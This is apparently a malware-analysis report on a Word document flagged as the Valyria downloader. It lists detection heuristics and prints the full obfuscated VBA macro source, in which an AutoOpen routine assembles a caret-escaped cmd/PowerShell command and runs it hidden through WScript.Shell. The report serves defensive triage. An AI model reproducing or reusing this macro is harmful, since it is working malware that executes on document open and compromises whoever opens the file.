MALICIOUS
310
Risk Score
Heuristics 10
-
ClamAV: Doc.Downloader.Valyria-6665591-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6665591-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next CreateObject("WScript.Shell").Run! ChrW(2 + 11 + 11 + 9 + 34) + HhzzUXUEW + ImAKLIoJU + SoUdsBtjIj + hQDPhYprIHi + JzZjoSYaz + uuNmL + jiIVXTiAp + IhXpISdiWD + qrXzXFZMsfihw, 545026675 - 545026675 End Sub -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next CreateObject("WScript.Shell").Run! ChrW(2 + 11 + 11 + 9 + 34) + HhzzUXUEW + ImAKLIoJU + SoUdsBtjIj + hQDPhYprIHi + JzZjoSYaz + uuNmL + jiIVXTiAp + IhXpISdiWD + qrXzXFZMsfihw, 545026675 - 545026675 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10731 bytes |
SHA-256: 8002fa010589e59530efcbe9581fa53ecd2f9fa4fbe3833127296f55e55826d2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
110 of 187 identifiers look randomly generated (e.g. 'ZMwlinQRdmpkhJ'); 4 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CCkPuPzirVT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "dAhzQwwVpDb"
Function SoUdsBtjIj()
On Error Resume Next
VarType iKwGV / HjElO + tXNHim - FtGmB
rjaFLORR = "MD /V" + "^:^ /" + "c " + " " + CStr(Chr(ZMwlinQRdmpkhJ + VBiqIDHaM + 34 + bVkwoPiB + qbQWwvbkzNjH)) + " s" + "e" + "T " + " ^ " + "^ M^Z" + "^d^=p^" + "5w^er^" + "]h^e^"
URcKdO = Sgn(5706)
IsArray WGJwYS * icYwE
VarType Log(uDfqv)
VarType 151 / ujLCLv
URcKdO = RoUZL / wbGTd
dsBVaCU = "ll^ _e " + "J)B^" + "X)$" + "/)^dw)" + "^9)G^4)" + "^Z/B^3"
URcKdO = Second(7)
VarType HbiKi / BtITz
IsArray Cos(aKLpb)
cQYOaXvoHir = ")C0" + ")+w^Bi" + ")^G5)" + "^Z/^B^" + "j)^H/)I"
VarType CDbl(59572 * OKJDb * ZPbIJG + fQNXXF)
VarType CDbl(EJvft * EZzWzz + 16276 / oAcpwS)
URcKdO = Month(44212360)
AjiCiWBiANP = ")BO)^" + "G" + "U)^" + "d))^u)$" + "c)^" + "Z/^B^i" + ")^Q" + "^M)+)" + "B^p)" + "^G^"
URcKdO = Fix(UhwIih + 74590)
VarType LCase(2626)
URcKdO = Tan(drudlC)
VarType Log(45986 + kLfwF)
VarType TypeName(54980 + fZthVj)
URcKdO = 54154 / GWowqH - McYvP / GqFYr
hdcjHb = "U)^+" + "^gB^" + "0){^]" + ")^J)B" + ",)" + "^Q^k)"
IsArray dGYXfT - UXQzh
IsArray VXdsFD / PGnrP
VarType Cos(379)
qkqVc = "^Z))^9" + ")Cc)^a)" + "^B0)H/)" + "c)" + ")^6)" + "C8" + ")Lw^B"
URcKdO = TypeName(36028 / CFcFW - 6459 + XiCZYT)
URcKdO = EoqmVY - bcvEP * zGjRCM + 129
IsArray 56636 + 56897
wcHUqYSV = "})" + "G^Q)a/^" + "B])C^" + "4" + ")aw" + "B^5)" + "^GQ" + ")+)^Bp)" + "^G^w" + ")cwB^0)" + "^HU)d)" + "^" + "Bv"
IsArray CByte(wcbDhV)
VarType Month(70756 - iomDbL)
QLzRfkGdFHX = ")^H" + "^I" + ")a/^B^" + "h)^Gw" + ")^" + "L" + "^g" + "B^j" + ")G8)" + "+"
VarType 15639 - QzWYA * 75762 / RDGsj
hnSsBYkOp = "/)v)^" + "G" + "^M)^+" + "^" + "w^B^" + "k){))V)" + "BR)^$" + "g)/)B" + "5)^" + "H/)^" + "d)^"
IsArray hAIPfh - rXsPpU
qrFJOaiVA = "B^" + "w){^5)L" + "w)v)^G" + "^4)Z/^" + "B" + "3)" + "^"
IsArray zjJMon / RBTHw + wBdcNi / fwQNhU
VarType FLmrf + EaQiE
URcKdO = 57506 + 79347 * jtDuKz / coaHw
KlVUjQa = "H^M" + ")^a/B0)" + "^GU)L" + "^g^B^p)" + "^HM)" + "Y" + "^w" + "^Bh)H" + ")" + ")c" + "))u)^GM" + ")+^w"
URcKdO = Tan(44)
IsArray Atn(1917)
IkAdfUJCV = "B})C8)e" + ")^B" + "))G^g)" + "d)B0)H)" + ")^Og)v)" + "C^8)Y^g" + "B^l)^" + "H/)" + "Y/)^,)C" + "4" + ")Y^gBp)" + "^H/"
IsArray 51406 + oSvuA
IsArray CStr(XSrjm)
tPYvtzFIkrw = ")+/" + "^Bp)G" + "M)cgBv" + ")C" + "4)Y" + "^" + "w^Bv)G" + "^0" + ")L^w),)" + "^Q" + "^M)/)B^"
SoUdsBtjIj = rjaFLORR + dsBVaCU + cQYOaXvoHir + AjiCiWBiANP + hdcjHb + qkqVc + wcHUqYSV + QLzRfkGdFHX + hnSsBYkOp + qrFJOaiVA + KlVUjQa + IkAdfUJCV + tPYvtzFIkrw
IsArray Int(mSdKq)
IsArray Tan(bLzuQ - GBSwfT / oTlvjY / jFicXj)
IsArray CVar(EjaTE)
IsArray 33207 / wUWPiw
End Function
Function hQDPhYprIHi()
On Error Resume Next
URcKdO = Int(11339 / XZVcUW - 68875 / uzlVL)
IsArray CByte(hjSSWh)
NMzVIjPrFvk = "5)^H" + "/)d)" + "Bw){^5" + ")^Lw" + ")v)HM" + ")^Y^wB^"
IsArray Rnd(940)
VarType CDate(kHARrN)
VarType Log(UdhVlJ - 96555 / ainUq - JIXASo)
VarType Log(79757010)
UzRnAvORu = "`)^Gk)+" + "/B^u)G" + "c)Z" + "/Bv)^H" + "I)Z^wB^" + "l)^H" + "U" + ")cwB" + "j)G^Q)^"
URcKdO = Atn(3109)
VarType Tan(336)
URcKdO = Atn(31)
IsArray WSQjz / 87241
ummhDmJBrwm = "d)^Bl)" + "HM)Yw^" + "B1)^" + "H/)^ZwB" + "j)" + "^G" + "^" + "Q)"
VarType CBool(WlVVL)
IsArray 62667 - wXULw
URcKdO = 44701 * mHwsuq
IsArray Val(251)
RYzTzBL = "cgB^i" + ")^HU)^+" + "^g" + "Bl)^H^M" + ")^d" + ")" + "^B^" + "p)C^4"
VarType Tan(69968 - 15915 - 34903 / Uzbbb)
QhJojv = ")cg^B" + "v)C8)^" + "+/)" + ",)" + "{c)^" + "M/"
URcKdO = Oct(KnIoP * kOiXZ * 70341 + 81226)
IsArray Log(6)
VarType PapfXQ - mApLwN
IsArray Sgn(519)
IsArray 29318 + KLDFi
OmdFYswO = "Bm)" + "^Qc)/)B" + "5)H" + "/" + ")^d" + ")B^w" + ")^{^" + "5)L^"
URcKdO = 75804 * XGksXi * MPRqAp * jzbZpP
MvzhiqUa = "w" + ")v)^G4" + ")Y/^B0" + ")^H" + "U)" + "cgB^l)^" + "G0)^+^" + "wB^u)^H" + "/"
IsArray Fix(dPQZLU)
IsArray Int(imkAL)
mziQVdUVv = ")LgB^," + ")^H^" + "U)" + "L^" + "wBI)Q" + "^])J" + "^w)^u)$" + "^M)c"
hQDPhYprIHi = NMzVIjPrFvk + UzRnAvORu + ummhDmJBrwm + RYzTzBL + QhJojv + OmdFYswO + MvzhiqUa + mziQVdUVv
VarType CByte(84)
IsArray LCase(56345 / vPnak * 29863 / Pwmjtz)
IsArray 66681 * bBYzj
URcKdO = Month(608)
URcKdO = SIzDl / DbwlI * 12157 + ajsGF
End Function
Function JzZjoSYaz()
On Error Resume Next
URcKdO = CDbl(4)
VarType Jswib / iFSAXs * cBvdM + wbNXo
URcKdO = 59168 + OjfcC
uVhcKpb = ")B^])^" + "G^k)d))" + "5" + ")C" + "c)/))`" + ")C^k)O" + "w)" + "k)^H" + "I)^a^" + "wB^L" + ")C))"
IsArray OqCwzd * WQOtv
URcKdO = uqtLJ + iZCuzm
URcKdO = 84714 + vnzEb
VarType LCase(jzSdr)
jAibHWUt = "P/)g" + ")" + "Cc)N/)" + "w)^{^" + "Y)Jw)^" + "7" + ")C/)^U" + ")Bv" + ")^" + "Hc)^P/)" + "^k)^GU" + ")^+"
URcKdO = 47341 - XGOpj / 50809 - niUAJn
IsArray 48568 + mZFZL - 67028 * 5607
URcKdO = 14512 + jElMJL
VarType Oct(96541 / zOUtJw)
DwZApYvzXHw = "gB^%){^" + "5)c)^" + "B^1)^G" + "I)+)" + "^Bp)^G" + "^M)"
VarType YTjWTP / tFHRsO * 74823 - MzSiMb
VarType Val(TuBiNS + zpzEaR)
vnBKfUnCT = "K" + "^w)`)^" + "$^w)" + "^Jw)" + "r)C/" + ")c^g" + "Br)Q" + "^])^"
URcKdO = Int(iJCdR + tLTzz)
VarType CDate(CZsXO)
IsArray 69828 / dKBiQb / llaUJ * vJMKzF
rQEitc = "Kw" + ")`)" + "C" + "4)^Z" + "/B4)G^U" + ")J^w)" + "^7)^" + "GY" + ")^+w" + "B,)GU)^" + "Y/^B^j)" + "G^g)K))"
VarType Oct(21766 + TANzU + 89882 / mwQis)
VarType CBool(201322132)
URcKdO = TimeValue(325)
WIbURfrjWi = "^k)" + "G" + "^0)S/^" + "B" + "^K)C)" + ")^a/^" + "B" + "^u)C"
IsArray 55446 - 96700
MiTjbbGAij = "))" + "J)^B," + ")" + "^Q" + "k)Z)" + ")" + "^p)^" + "H])d)" + "B" + ","
URcKdO = TimeValue(74824 * iSpak)
ivsNVDPsY = ")^H^k" + ")^e" + "w" + ")^k" + ")^$c)V" + ")^B3" + ")C^" + "4)R)^"
URcKdO = 4208 + 51510 - ZUHUwc * OnYCpj
OpvTzKDQzE = "B" + "v" + ")^Hc)^+" + "^g^B]" + ")G" + "^8)^Y/" + "B^k)^" + "QY)^a/^" + "B^])G^U" + ")^K))^k"
VarType 96183 + PlCoEd
VarType uKtJQ / 60887 - 89060 / FTDToL
BrOqrb = ")^G^0)S" + "/^B" + "K)C^w)" + "^I))^k)" + "^$))" + "+^w^B^3" + ")C" + "k)OwB"
VarType SOzpih - mYrQYo + 40281 / ozCRiE
URcKdO = CDbl(50)
VarType CDate(IAioai)
AwqINaizn = "^J" + ")G^4)^d" + "^g^Bv)^" + "G])^Z/" + ")" + "})^Qk)"
JzZjoSYaz = uVhcKpb + jAibHWUt + DwZApYvzXHw + vnBKfUnCT + rQEitc + WIbURfrjWi + MiTjbbGAij + ivsNVDPsY + OpvTzKDQzE + BrOqrb + AwqINaizn
URcKdO = Sin(225)
VarType CDate(WpoEsW)
VarType 1409 - OVfMdw * sodRR * MfpIjp
End Function
Function uuNmL()
On Error Resume Next
IsArray Round(fsnidT)
URcKdO = 81053 - mhiEij
OhaaiDT = "d)" + "^B^" + "l)G" + "^0)I)" + ")k)$))" + "+" + "wB" + "^3" + ")^{])^" + "Y"
URcKdO = CCur(wFvBq)
VarType 15425 + ZOPAwY
IsArray Log(384508999)
IsArray Val(81842 + 85086)
hEQAd = "^g^B" + ",)^G^U)" + "Y/Br)" + "{])^" + "f/B" + "^j" + ")^G^Q"
IsArray MVSuCB - RLFrC * 16998 * XrdCV
VarType 70730 - ciEMTP
pzdmAQRQ = ")d)B^" + "j)" + "^Gg)e" + "wB9)H" + "^0)I))" + "g)C" + "))I))g" + ")C))^I" + "))" + "g" + ")C" + "))"
URcKdO = iafmk * HnQZaU
URcKdO = hQDrJ + WIXwY + kqphCO + vIbdXn
CJKEs = "^I))" + "g)C))I" + "))g" + ")C))I))" + "g" + "))==" + "&& se"
VarType Round(FSKTr / WwPXu + 22733 + aDjNqs)
URcKdO = CDec(jWMppI)
WIEtOdzG = "^t " + "^ ^ ^O^" + "D" + "^G=^!^" + "M^Z^d:" + "%=2^!" + "&S^e^" + "t M9^P" + "^T="
VarType CDbl(61685 + vzHDE)
IsArray Atn(BJQKjS)
VarType CDate(4647)
URcKdO = THiYz * wVFRV
VarType Rnd(CSUtR)
VarType TimeValue(83)
jwMDsZmchKI = "!^O^D" + "^G" + "^:Q^=^" + "E!&" + " " + " S" + "^e^" + "t r^" + "Y=!^" + "M^" + "9^P^" + "T" + "^:^,^"
IsArray 43803 / sIoZwE - rrWiZ / pVHZsq
VarType 16274 * bAJDih * UFbLZ - BIvJM
HwsWzYabO = "=y!& s" + "^eT " + "^" + " " + "^" + "b^" + "XS" + "=!"
VarType Tan(HTjiV)
IsArray LCase(4227)
EPICJSmWE = "r^Y^:^}" + "^=^t^" + "!" + "&& " + " s^E" + "T ^ ^" + " ^ " + "^D^W" + "^Zs=^!^"
IsArray Sin(ppqDh / QsVjfW - GNJlU / diicEi)
IsArray CStr(43011 / AUUfQr)
IsArray 49202 + NTBvj
VarType Second(269621355)
RfGzV = "b^XS^:/" + "^" + "=^Q^" + "!& " + " " + "SE^t ^ "
IsArray CVar(742)
IsArray Rnd(NGqXH)
IsArray 21780 * 23733
VarType LCase(51)
URcKdO = LCase(MWZktL)
QNHiEjzFTI = "^ " + "^ ^ ^5" + "c=" + "^!" + "^D^" + "W^Z^s^" + ":^5"
uuNmL = OhaaiDT + hEQAd + pzdmAQRQ + CJKEs + WIEtOdzG + jwMDsZmchKI + HwsWzYabO + EPICJSmWE + RfGzV + QNHiEjzFTI
URcKdO = hVrakz * wSnIfz
VarType CDec(Dwdaq)
IsArray CDate(93893 / KwjGOo * jEuHJr + wzthzU)
End Function
Function jiIVXTiAp()
On Error Resume Next
URcKdO = Vllnb - pnckuh
VarType 7298 / PJZDDk
URcKdO = Int(cYzdj / CcCFp)
JmFTS = "^=o!&&s" + "E^t ^ N" + "j^T^O=" + "^!^5c^:" + "^" + "$^=^" + "F^!&&"
URcKdO = 55077 / RFPGf
IsArray 94566 / UwARnu / AWdRJ + dzIfZ
OfTqIizZThD = " S^e" + "t ^ " + "^i^" + "t8=!" + "Nj" + "^T^O:" + ")^=^A" + "^!&& " + " S^ET ^"
IsArray Val(9219)
IsArray Hex(86)
VarType Month(85437 + 45989 * IIwndL + fbchjr)
WJKjd = " V^" + "U^tL=" + "^!^i^t" + "8" + "^:`=n" + "!&" + "& " + " Se" + "^t" + " ^ ^ " + "^Dw^A" + "^8=^!V^" + "U^"
IsArray FShDTn - FHbGQE + jDcii * VNtRWd
IsArray ScnKZ / WWKTT
URcKdO = Int(56)
KzmGVRif = "t^L:^{=" + "^" + "D^!&&s^" + "eT " + "r^t=!" + "^Dw^A^" + "8" + "^:^]^" + "=^s^!&" + " se" + "t" + " ^ ^ "
IsArray 62702 / FiaGw + 58335 * NkzMr
VarType TimeValue(hpAmn)
URcKdO = 77945 + ruzJtI
kVDoi = "^ " + "d^a" + "=^!r^" + "t" + ":" + "^+^=" + "b^!" + "&& " + " s^e^t" + " ^ ^" + " n^P^"
URcKdO = Round(cjrLr)
aWwOidDPw = "3^7=^" + "!^d^a^" + ":^_=-!" + "&&CA^l" + "^l %" + "n^" + "P^3^7"
URcKdO = 8923 / 76371 * 46160 - acziwu
URcKdO = Log(57670 + iGBMK + fGmlvC * jkLhEp)
VarType 38883 + zGOUPw
PkqUUEBIfvn = "% " + " " + CStr(Chr(qqioWEYZJjovtp + DIPhiZOULH + 34 + OLaTulGzkpfWJ + jhBCmjcJY)) + ""
jiIVXTiAp = JmFTS + OfTqIizZThD + WJKjd + KzmGVRif + kVDoi + aWwOidDPw + PkqUUEBIfvn
URcKdO = Hex(ZmZWmw)
VarType CDate(WjoiWi)
IsArray 3441 * 9503 / ZRCcX + vNTPpw
URcKdO = 1181 - GuwpX
End Function
Attribute VB_Name = "XjbqHVjO"
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(2 + 11 + 11 + 9 + 34) + HhzzUXUEW + ImAKLIoJU + SoUdsBtjIj + hQDPhYprIHi + JzZjoSYaz + uuNmL + jiIVXTiAp + IhXpISdiWD + qrXzXFZMsfihw, 545026675 - 545026675
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.